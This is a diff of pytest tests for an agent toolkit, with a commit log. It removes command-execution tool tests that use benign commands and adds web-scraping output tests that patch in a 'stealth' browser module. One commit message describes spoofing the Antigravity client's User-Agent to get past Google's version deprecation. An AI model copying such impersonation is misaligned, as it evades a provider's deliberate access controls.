-        """Executing a simple command returns output."""
-        result = await execute_command_fn(command="echo 'Hello World'", **mock_workspace)
-
-        assert result["success"] is True
-        assert result["return_code"] == 0
-        assert "Hello World" in result["stdout"]
-
-    async def test_execute_failing_command(self, execute_command_fn, mock_workspace, mock_secure_path):
-        """Executing a failing command returns non-zero exit code."""
-        result = await execute_command_fn(command="exit 1", **mock_workspace)
-
-        assert result["success"] is True
-        assert result["return_code"] == 1
-
-    async def test_execute_command_with_stderr(self, execute_command_fn, mock_workspace, mock_secure_path):
-        """Executing a command that writes to stderr captures it."""
-        result = await execute_command_fn(command="echo 'error message' >&2", **mock_workspace)
-
-        assert result["success"] is True
-        assert "error message" in result.get("stderr", "")
-
-    async def test_execute_command_list_files(self, execute_command_fn, mock_workspace, mock_secure_path, tmp_path):
-        """Executing ls command lists files."""
-        (tmp_path / "testfile.txt").write_text("content", encoding="utf-8")
-
-        result = await execute_command_fn(command=f"ls {tmp_path}", **mock_workspace)
-
-        assert result["success"] is True
-        assert result["return_code"] == 0
-        assert "testfile.txt" in result["stdout"]
-
-    async def test_execute_command_with_pipe(self, execute_command_fn, mock_workspace, mock_secure_path):
-        """Executing a command with pipe works correctly."""
-        result = await execute_command_fn(command="echo 'hello world' | tr 'a-z' 'A-Z'", **mock_workspace)
-
-        assert result["success"] is True
-        assert result["return_code"] == 0
-        assert "HELLO WORLD" in result["stdout"]
-
-    @pytest.fixture
-    def bash_output_fn(self, mcp):
-        from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
-
-        register_tools(mcp)
-        return mcp._tool_manager._tools["bash_output"].fn
-
-    @pytest.fixture
-    def bash_kill_fn(self, mcp):
-        from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
-
-        register_tools(mcp)
-        return mcp._tool_manager._tools["bash_kill"].fn
-
-    async def test_per_call_timeout_overrides_default(self, execute_command_fn, mock_workspace, mock_secure_path):
-        """A per-call timeout under the default kills the command early."""
-        import time
-
-        start = time.monotonic()
-        result = await execute_command_fn(
-            command="sleep 10",
-            timeout_seconds=1,
-            **mock_workspace,
-        )
-        elapsed = time.monotonic() - start
-
-        assert result.get("timed_out") is True
-        assert "1 seconds" in result.get("error", "")
-        assert elapsed < 5, f"timeout did not kill the command promptly ({elapsed:.2f}s)"
-
-    async def test_timeout_is_clamped_upwards(self, execute_command_fn, mock_workspace, mock_secure_path):
-        """A timeout above the 600s ceiling is silently clamped."""
-        result = await execute_command_fn(
-            command="echo fast",
-            timeout_seconds=99999,
-            **mock_workspace,
-        )
-        assert result["success"] is True
-        assert "fast" in result["stdout"]
-
-    async def test_event_loop_unblocked_while_command_runs(self, execute_command_fn, mock_workspace, mock_secure_path):
-        """The event loop keeps servicing other tasks while a bash command runs."""
-        ticks = 0
-
-        async def ticker():
-            nonlocal ticks
-            for _ in range(20):
-                await asyncio.sleep(0.05)
-                ticks += 1
-
-        ticker_task = asyncio.create_task(ticker())
-        result = await execute_command_fn(command="sleep 0.5", **mock_workspace)
-        await ticker_task
-
-        assert result["success"] is True
-        assert ticks >= 5, f"event loop looked blocked during subprocess (only {ticks} ticks in 1s)"
-
-    async def test_background_job_start_poll_and_complete(
-        self,
-        execute_command_fn,
-        bash_output_fn,
-        mock_workspace,
-        mock_secure_path,
-    ):
-        """A run_in_background job can be started, polled, and reports its exit status."""
-        py_script = (
-            "import time,sys;"
-            "print('one');sys.stdout.flush();time.sleep(0.1);"
-            "print('two');sys.stdout.flush();time.sleep(0.1);"
-            "print('three')"
-        )
-        start_result = await execute_command_fn(
-            command=f'"{sys.executable}" -c "{py_script}"',
-            run_in_background=True,
-            **mock_workspace,
-        )
-        assert start_result["background"] is True
-        job_id = start_result["id"]
-
-        deadline = asyncio.get_event_loop().time() + 5.0
-        seen_text = ""
-        while asyncio.get_event_loop().time() < deadline:
-            poll = await bash_output_fn(id=job_id, **mock_workspace)
-            seen_text += poll["stdout"]
-            if poll["status"].startswith("exited"):
-                break
-            await asyncio.sleep(0.05)
-
-        assert "one" in seen_text
-        assert "two" in seen_text
-        assert "three" in seen_text
-        assert poll["status"] == "exited(0)"
-
-    async def test_background_job_kill(
-        self,
-        execute_command_fn,
-        bash_output_fn,
-        bash_kill_fn,
-        mock_workspace,
-        mock_secure_path,
-    ):
-        """bash_kill terminates a long-running background job."""
-        start_result = await execute_command_fn(
-            command="sleep 30",
-            run_in_background=True,
-            **mock_workspace,
-        )
-        job_id = start_result["id"]
-
-        kill_result = await bash_kill_fn(id=job_id, **mock_workspace)
-        assert kill_result["id"] == job_id
-        assert "terminated" in kill_result["status"] or "killed" in kill_result["status"]
-
-        poll = await bash_output_fn(id=job_id, **mock_workspace)
-        assert "no background job" in poll.get("error", "")
-
-    async def test_bash_output_isolated_across_agents(self, execute_command_fn, bash_output_fn, mock_secure_path):
-        """Agent A's job id is not reachable from agent B."""
-        start = await execute_command_fn(
-            command="sleep 5",
-            run_in_background=True,
-            agent_id="agent-A",
-        )
-        poll_b = await bash_output_fn(id=start["id"], agent_id="agent-B")
-        assert "no background job" in poll_b.get("error", "")
-
-        from aden_tools.tools.file_system_toolkits.execute_command_tool import background_jobs
-
-        await background_jobs.clear_agent("agent-A")
@@ -374,6 +374,188 @@ class TestWebScrapeToolLinkConversion:
        assert len([t for t in texts if not t.strip()]) == 0


+class TestWebScrapeToolAIFriendlyOutput:
+    """Tests for the AI-friendly output additions: structured data,
+    headings, page_type, block-level newlines, inline links, truncation
+    metadata, and offset-based pagination."""
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_block_level_newlines_preserved(self, mock_pw, mock_stealth, web_scrape_fn):
+        """Block elements (p, h1, li) produce newlines, not space-collapsed."""
+        html = """
+        <html><body>
+            <h1>Title</h1>
+            <p>First paragraph.</p>
+            <p>Second paragraph.</p>
+            <ul><li>Item one</li><li>Item two</li></ul>
+        </body></html>
+        """
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com")
+        assert "error" not in result
+        content = result["content"]
+        assert "Title" in content
+        assert "First paragraph." in content
+        assert "Second paragraph." in content
+        # Block separation should produce newlines, not run paragraphs together
+        assert "First paragraph.\n" in content or "First paragraph.\n\nSecond" in content
+        assert "Item one" in content and "Item two" in content
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_headings_outline_returned(self, mock_pw, mock_stealth, web_scrape_fn):
+        """Headings outline lists h1-h6 with level + text."""
+        html = """
+        <html><body>
+            <h1>Top</h1>
+            <h2>Section A</h2>
+            <h3>Sub A1</h3>
+        </body></html>
+        """
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com")
+        assert result["headings"] == [
+            {"level": 1, "text": "Top"},
+            {"level": 2, "text": "Section A"},
+            {"level": 3, "text": "Sub A1"},
+        ]
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_inline_links_when_include_links(self, mock_pw, mock_stealth, web_scrape_fn):
+        """include_links=True inlines anchors as [text](url) in content."""
+        html = """
+        <html><body>
+            <p>See <a href="/docs">our docs</a> for details.</p>
+        </body></html>
+        """
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com", include_links=True)
+        assert "[our docs](https://example.com/docs)" in result["content"]
+        # Separate links list still present for back-compat
+        assert any(link["text"] == "our docs" for link in result["links"])
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_structured_data_json_ld(self, mock_pw, mock_stealth, web_scrape_fn):
+        """JSON-LD blocks are parsed and surfaced under structured_data."""
+        html = """
+        <html><head>
+            <script type="application/ld+json">
+            {"@type": "Article", "headline": "Hello"}
+            </script>
+        </head><body><p>body</p></body></html>
+        """
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com")
+        assert "structured_data" in result
+        assert result["structured_data"]["json_ld"] == [{"@type": "Article", "headline": "Hello"}]
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_structured_data_open_graph(self, mock_pw, mock_stealth, web_scrape_fn):
+        """OpenGraph meta tags are surfaced under structured_data.open_graph."""
+        html = """
+        <html><head>
+            <meta property="og:title" content="OG Title">
+            <meta property="og:type" content="article">
+        </head><body><p>body</p></body></html>
+        """
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com")
+        assert result["structured_data"]["open_graph"] == {
+            "title": "OG Title",
+            "type": "article",
+        }
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_truncation_metadata(self, mock_pw, mock_stealth, web_scrape_fn):
+        """Truncated responses set truncated/total_length/next_offset."""
+        html = f"<html><body>{'a' * 5000}</body></html>"
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com", max_length=1000)
+        assert result["truncated"] is True
+        assert result["total_length"] == 5000
+        assert result["next_offset"] == 1000
+        assert result["offset"] == 0
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_offset_pagination(self, mock_pw, mock_stealth, web_scrape_fn):
+        """offset arg returns content starting from the given character."""
+        body = "a" * 1000 + "b" * 1000 + "c" * 1000
+        html = f"<html><body>{body}</body></html>"
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com", max_length=1000, offset=1000)
+        assert result["offset"] == 1000
+        # Window should start in the b-region
+        assert result["content"].startswith("b")
+        assert result["truncated"] is True
+        assert result["next_offset"] == 2000
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_page_type_listing(self, mock_pw, mock_stealth, web_scrape_fn):
+        """3+ <article> elements => page_type 'listing'."""
+        html = """
+        <html><body>
+            <article><h2>Post 1</h2></article>
+            <article><h2>Post 2</h2></article>
+            <article><h2>Post 3</h2></article>
+        </body></html>
+        """
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com")
+        assert result["page_type"] == "listing"
+
+    @pytest.mark.asyncio
+    @patch(_STEALTH_PATH)
+    @patch(_PW_PATH)
+    async def test_page_type_article(self, mock_pw, mock_stealth, web_scrape_fn):
+        """Single <article> => page_type 'article'."""
+        html = "<html><body><article><p>Hello</p></article></body></html>"
+        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
+        mock_pw.return_value = mock_cm
+        mock_stealth.return_value.apply_stealth_async = AsyncMock()
+
+        result = await web_scrape_fn(url="https://example.com")
+        assert result["page_type"] == "article"
+
+
 class TestWebScrapeToolErrorHandling:
    """Tests for error handling and early exit before JS wait."""

@@ -388,7 +570,9 @@ class TestWebScrapeToolErrorHandling:
        mock_stealth.return_value.apply_stealth_async = AsyncMock()

        result = await web_scrape_fn(url="https://example.com/missing")
-        assert result == {"error": "HTTP 404: Failed to fetch URL"}
+        assert result["error"] == "HTTP 404: Failed to fetch URL"
+        assert result["status"] == 404
+        assert "hint" in result
        mock_page.wait_for_load_state.assert_not_called()

    @pytest.mark.asyncio
Author	SHA1	Message	Date
Richard Tang	fe74718fd9	chore: lint CI / Lint Python (push) Waiting to run Details CI / Test Python Framework (ubuntu-latest) (push) Waiting to run Details CI / Test Python Framework (windows-latest) (push) Waiting to run Details CI / Test Tools (ubuntu-latest) (push) Waiting to run Details CI / Test Tools (windows-latest) (push) Waiting to run Details CI / Validate Agent Exports (push) Blocked by required conditions Details	2026-05-04 17:57:56 -07:00
Richard Tang	07c97e2e9b	feat: llm logging	2026-05-04 17:57:20 -07:00
Richard Tang	07600c5ab5	feat: encourage action plan prompts	2026-05-04 17:55:44 -07:00
Richard Tang	e7d4ce0057	chore: lint	2026-05-04 12:36:28 -07:00
Richard Tang	d9813288d9	fix: install system mcp when they fail	2026-05-04 12:35:21 -07:00
Richard Tang	41fbdcb940	fix(frontend): mcp tools server title format	2026-05-04 12:35:21 -07:00
Hundao	4a9b22719b	fix(antigravity): unblock Gemini chats — schema sanitizer + UA bump (#7170 ) * fix(antigravity): translate JSON Schema unions to Gemini nullable Tool parameter schemas using JSON Schema 2020-12 unions like "type": ["string", "null"] crash Gemini's function_declarations parser with HTTP 400. Two existing tools trip this: - core/framework/tasks/tools/colony_tools.py:52 (owner in _update_schema) - core/framework/tasks/tools/session_tools.py:84-87 (same shape) Add an adapter-level sanitizer that walks the schema tree and converts union-with-null to OpenAPI 3.0 "nullable": true (which Gemini accepts). Recurses into properties, items, additionalProperties, and the anyOf/oneOf/allOf combinators. Source schemas remain valid JSON Schema so OpenAI/Anthropic backends are unaffected. * fix(antigravity): bump spoofed UA past Google's deprecation cutoff Google has deprecated client version "Antigravity/1.18.3" — chats now return "This version of Antigravity is no longer supported" instead of a real model response. Bump the spoofed User-Agent to "Antigravity/1.23.2" + "Electron/39.2.3" (current desktop release) and add a comment that this needs periodic re-bumping. A more durable fix (auto-detect from the installed app's Info.plist) is a follow-up. * fix(antigravity): fail loud on multi-type non-null Gemini schema unions Per review on PR #7170: silently picking the first type from a union like ["string", "integer", "null"] changes the contract for callers that rely on the other types, and the failure is hard to diagnose at the Gemini side. Replace the silent narrowing with a ValueError that points the schema author at anyOf or a single type. A repo scan finds no current Gemini-bound schemas using multi-type non-null unions, so this branch is preventative for future authors. * chore(antigravity): drop em dash from test docstring	2026-05-05 01:16:48 +08:00
Hundao	8cb0531959	fix(ci): unblock main CI, sort imports + install Playwright Chromium (#7172 ) * fix(lint): organize imports in queen_orchestrator.create_queen Ruff I001 blocks CI on every PR against main. The deferred imports inside create_queen were not in alphabetical order between the queen package and the framework package; ruff auto-fix moves framework.config below the framework.agents.queen.nodes block. No behavior change. * fix(ci): install Playwright Chromium before Test Tools job The new chart_tools smoke tests added in `feabf327` require a Chromium build for ECharts/Mermaid rendering, but the test-tools workflow only ran `uv sync` and went straight to pytest. Three tests (test_render_echarts_bar_chart, test_render_echarts_accepts_string_spec, test_render_mermaid_flowchart) crash on every PR with: BrowserType.launch: Executable doesn't exist at /home/runner/.cache/ms-playwright/chromium_headless_shell-1208/... Split the install/run into separate steps and add `playwright install chromium` before pytest. Use `--with-deps` on Linux to pull system libraries; Windows runners only need the browser binary. * fix(tests): adapt test_file_state_cache to new file_ops API The file_ops rewrite in `feabf327` dropped the standalone hashline_edit tool (the file_system_toolkits/hashline_edit/ directory was removed) and switched edit_file to a mode-first signature (mode, path, old_string, new_string, ...). The test fixture still tried to look up "hashline_edit" via the MCP tool manager and crashed with KeyError before any test could run, and the edit_file calls were positional in the old order so they hit "unknown mode 'e.py'" once the fixture was fixed. Drop the stale hashline_edit lookup and pass mode="replace" explicitly to every edit_file call. All 11 tests pass locally. * fix(tests): skip terminal_tools tests on Windows (POSIX-only) The new terminal_tools package added in `feabf327` imports the Unix-only `resource` module in tools/src/terminal_tools/common/limits.py to set RLIMIT_CPU / RLIMIT_AS / RLIMIT_FSIZE on subprocesses. Five of the six terminal_tools test files therefore crash on windows-latest with `ModuleNotFoundError: No module named 'resource'` once their fixtures trigger the import chain. test_terminal_tools_pty.py already has the right module-level skip (PTY is POSIX-only). Apply the same `pytestmark = skipif(win32)` to the other five so the whole suite skips cleanly on Windows. The terminal-tools package is bash-only by design (zsh refused at the shell-resolver level), so a Windows port is out of scope.	2026-05-05 00:32:59 +08:00
Richard Tang	feabf32768	fix: worker context token	2026-05-03 11:45:37 -07:00
Richard Tang	eee55ea8c7	chore: fix wrong model name	2026-05-03 11:35:05 -07:00
Richard Tang	78fffa63ec	chore: ci and release doc Release / Create Release (push) Waiting to run Details	2026-05-01 18:06:39 -07:00
Richard Tang	9a75d45351	chore: lint	2026-05-01 17:53:44 -07:00
Timothy	3a94f52009	feat: sync tool result contentful display	2026-05-01 17:44:19 -07:00
Timothy	522e0f511e	fix: y-axis	2026-05-01 15:48:36 -07:00
Timothy	e6310f1243	fix: normalize chart spec in renderer	2026-05-01 15:36:09 -07:00
Richard Tang	12ffacccab	feat: tools config frontend grouping and tools cleanup	2026-05-01 15:28:40 -07:00
Timothy	8c36b1575c	Merge branch 'feature/merge-to-file-ops' into feat/file-ops	2026-05-01 14:57:21 -07:00
Richard Tang	a09eac06f1	feat: improve web search and consolidate browser open	2026-05-01 14:55:20 -07:00